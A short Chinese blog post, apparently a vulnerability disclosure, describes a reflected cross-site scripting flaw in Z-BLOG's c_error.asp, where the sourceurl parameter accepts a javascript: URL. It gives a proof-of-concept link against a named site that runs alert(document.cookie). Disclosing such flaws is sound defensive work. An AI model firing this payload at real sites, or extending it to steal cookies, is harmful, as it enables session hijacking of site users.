Z-BLOG XSS Vulnerabilities

漏洞描述:
Z-BLOG后台登陆错误信息显示文件c_error.asp,虽然对跳转URL的参数sourceurl进行了编码,但没有判断链接头部,执行了javascript伪协议,造成跨站脚本漏洞。
漏洞测试:

http://www.woyigui.cn/function/c_error.asp?errorid=7&number=0&description=&source=&sourceurl=javascript:alert(document.cookie)

from:http://www.woyigui.cn/Z-BLOG-XSS-Vulnerabilities/

发表评论

电子邮件地址不会被公开。

您可以使用这些HTML标签和属性: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>